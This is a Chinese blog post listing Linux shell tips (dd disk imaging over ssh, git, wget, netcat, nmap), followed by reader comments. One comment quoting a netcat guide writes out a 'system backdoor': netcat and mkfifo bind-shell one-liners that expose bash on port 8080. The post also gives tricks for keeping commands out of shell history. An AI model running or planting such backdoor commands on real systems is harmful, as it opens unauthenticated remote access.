实用的Linux Shell用法和技巧


1、为 man 手册创建 pdf 版本
man -t manpage | ps2pdf - filename.pdf

比如制作 ls 命令的 man 手册 pdf 文件

man -t ls | ps2pdf - ls.pdf

除了制作pdf,还有一种制作txt版本的manual的方法:

man -t find | ps2pdf -> find_manual.pdf
man find | col -b > find_manual.txt

2、为命令绑定快捷键
bind -x '"C-l":ls -l'

这样直接按 CTRL+L 就列出目录了,你可以把这条命令加入到 ~/.bashrc 中,这样不必每次重复设定。

3、一键启动远程主机上的 tmux

tmux 是一个 GNU Screen 的替代品,一个可以在终端里开启多窗口的工具,可以说是很好用的远程服务维护工具,通过以下命令就可以在终端中一条命令直接开启远程服务器上的 tmux 。

ssh -t [email protected] tmux

如果你之前在远程主机上已经开启了 tmux 的话,用以下命令。

ssh -t [email protected] tmux att

除此之外,你可以结合第二条命令来绑定快捷键,这样我们只需一键就可以快速登录并开启 tmux 了。

4、用 file 命令查看设备信息{比较详细}
file -s /dev/sd*
5、用 md5 值对比两个文件是否一致
cmp file1 file2

一致的话不会出现提示,不一致的话就会有提示信息

6、一条命令把 CD/DVD 作成 ISO 文件
dd if=/dev/cdrom of=file.iso
7、通过 ssh 复制整个硬盘到远程目录(带压缩)
dd if=/dev/sda | gzip -c | ssh user@ip 'dd of=/mnt/backups/sda.dd'
8、在不浪费磁盘的情况下测试网络速度
dd if=/dev/zero bs=4096 count=1048576 | ssh user@ip 'cat >/dev/null'

以上命令通过 ssh 发送 4 GB 数据到远程主机,但不会占用任何磁盘空间。

原文链接http://wowubuntu.com/shell-cmd.html


Linux shell用法和技巧

检查远程端口是否对bash开放:
echo >/dev/tcp/8.8.8.8/53 && echo "open"
让进程转入后台:
Ctrl + z
将进程转到前台:
fg
产生随机的十六进制数,其中n是字符数:
openssl rand -hex n
在当前shell里执行一个文件里的命令
source /home/user/file.name
截取前5个字符:
${variable:0:5}
SSH debug 模式:
ssh -vvv user@ip_address
SSH with pem key(-i选项):
ssh user@ip_address -i key.pem
用wget抓取完整的网站目录结构,存放到本地目录中:
wget -r --no-parent --reject "index.html*" http://hostname/ -P /home/user/dirs
一次创建多个目录
mkdir -p /home/user/{test,test1,test2}
列出包括子进程的进程树:
ps axwef
创建 war 文件:
jar -cvf name.war file
测试硬盘写入速度:
dd if=/dev/zero of=/tmp/output.img bs=8k count=256k; rm -rf /tmp/output.img
测试硬盘读取速度:
hdparm -Tt /dev/sda
获取文本的md5 hash
echo -n "text" | md5sum
检查xml格式:
xmllint --noout file.xml
将tar.gz提取到新目录里(-C选项):
tar zxvf package.tar.gz -C new_dir
使用curl获取HTTP头信息(-I选项):
curl -I http://www.example.com
修改文件或目录的时间戳(YYMMDDhhmm):
touch -t 0712250000 file
用wget命令执行ftp下载:
wget -m ftp://username:password@hostname
生成随机密码(例子里是16个字符长):
LANG=c < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
快速备份一个文件(实用):
cp some_file_name{,.bkp}
访问Windows共享目录:
smbclient -U "DOMAINuser" //dc.domain.com/share/test/dir
执行历史记录里的命令(这里是第100行):
!100
解压:
unzip package_name.zip -d dir_name
输入多行文字(CTRL + d 退出):
cat > test.txt
创建空文件或清空一个现有文件:
>test.txt
与Ubuntu NTP server同步时间:
ntpdate ntp.ubuntu.com
用netstat显示所有tcp4监听端口:
netstat -lnt4 | awk '{print $4}' | cut -f2 -d: | grep -o '[0-9]*'
qcow2镜像文件转换:
qemu-img convert -f qcow2 -O raw precise-server-cloudimg-amd64-disk1.img
                                 precise-server-cloudimg-amd64-disk1.raw
周期性的运行程序,并显示其输出(缺省是2秒一次):
watch ps -ef
所有用户列表:
getent passwd
Mount root in read/write mode:
mount -o remount,rw /
挂载一个目录(这是不能使用链接的情况):
mount --bind /source /destination
动态更新DNS server:
nsupdate <<EOF
update add $HOST 86400 A $IP
send
EOF
递归grep所有目录:
grep -r "some_text" /path/to/dir
列出前10个最大的文件:
lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB "$9 }' | sort -n -u | tail
显示剩余内存(MB):
free -m | grep cache | awk '/[0-9]/{ print $4" MB" }'
打开Vim并跳到文件末:
vim + some_file_name
Git 克隆指定分支(master):
git clone [email protected]:name/app.git -b master
Git 切换到其它分支(develop):
git checkout develop
Git 删除分支(myfeature):
git branch -d myfeature
Git 删除远程分支
git push origin :branchName
Git 将新分支推送到远程服务器:
git push -u origin mynewfeature
打印历史记录中最后一次cat命令:
!cat:p
运行历史记录里最后一次cat命令:
!cat
找出/home/user下所有空子目录:
find /home/user -maxdepth 1 -type d -empty
获取test.txt文件中第50-60行内容:
< test.txt sed -n '50,60p'
运行最后一个命令(如果最后一个命令是mkdir /root/test, 下面将会运行: sudo mkdir /root/test):
sudo !!
创建临时RAM文件系统 – ramdisk (先创建/tmpram目录):
mount -t tmpfs tmpfs /tmpram -o size=512m
Grep whole words:
grep -w "name" test.txt
在需要提升权限的情况下往一个文件里追加文本:
echo "some text" | sudo tee -a /path/file
列出所有kill signal参数:
kill -l
在bash历史记录里禁止记录最后一次会话:
kill -9 $$
扫描网络寻找开放的端口:
nmap -p 8081 172.20.0.0/16
设置git email:
git config --global user.email "[email protected]"
To sync with master if you have unpublished commits:
git pull --rebase origin master
将所有文件名中含有”txt”的文件移入/home/user目录:
find -iname "*txt*" -exec mv -v {} /home/user ;
将文件按行并列显示:
paste test.txt test1.txt
shell里的进度条:
pv data.log
使用netcat将数据发送到Graphite server:
echo "hosts.sampleHost 10 `date +%s`" | nc 192.168.200.2 3000
将tabs转换成空格:
expand test.txt >test1.txt
Skip bash history(不在history命令中记录):
<space>cmd
去之前的工作目录:
cd -
拆分大体积的tar.gz文件(每个100MB),然后合并回去:
split –b 100m /path/to/large/archive /path/to/output/files
cat files* > archive
使用curl获取HTTP状态码
curl -sL -w "%{http_code}\n" www.example.com -o /dev/null
设置root密码,强化MySQL安全
/usr/bin/mysql_secure_installation
当Ctrl + c不好使时
Ctrl +
获取文件owner
stat -c %U file.txt
block设备列表
lsblk -f
找出文件名结尾有空格的文件
find . -type f -exec egrep -l " +$" {} ;
找出文件名有tab缩进符的文件
find . -type f -exec egrep -l $'t' {} ;
用“=”打印出横线:
printf '%100sn' | tr ' ' =
[英文原文Linux shell tips and tricks ]

《“实用的Linux Shell用法和技巧”》 有 4 条评论

  1. `
    $ man man

    man -k printf
    Search the short descriptions and manual page names for the keyword printf as regular expression. Print out any matches. Equivalent to apropos -r printf.
    在手册页的名字和简述中进行关键字(正则)匹配,等价于「apropos -r printf」。

    $ man -k printf
    curl_mprintf (3) – formatted output conversion
    format (n) – Format a string in the style of sprintf
    printf (1) – format and print data
    set_matchpathcon_printf (3) – set flags controlling the operation of matchpathcon or matchpathcon_index and configure the behaviour of validity checking and error displaying
    Tcl_AppendPrintfToObj (3) – manipulate Tcl objects as strings
    Tcl_ObjPrintf (3) – manipulate Tcl objects as strings

    $ man -k ‘^printf’
    printf (1) – format and print data

    $ whatis apropos
    apropos (1) – search the manual page names and descriptions
    `

  2. 用好你的瑞士军刀/netcat
    https://zhuanlan.zhihu.com/p/83959309
    `
    端口测试
    nc -vz -w3 192.168.1.2 8080

    传输测试
    nc 192.168.1.2 8080

    测试 UDP 会话
    nc -u 192.168.1.2 8080

    文件传输
    nc 192.168.1.2 8080 < image.jpg 网速吞吐量测试 time nc -n 192.168.1.2 8080 < /dev/zero 系统后门 /bin/nc.traditional -l -p 8080 -e /bin/bash 或 mkfifo /tmp/f cat /tmp/f | /bin/bash 2>&1 | /bin/nc.openbsd -l -p 8080 > /tmp/f
    `

回复 a-z 取消回复

您的电子邮箱地址不会被公开。 必填项已用*标注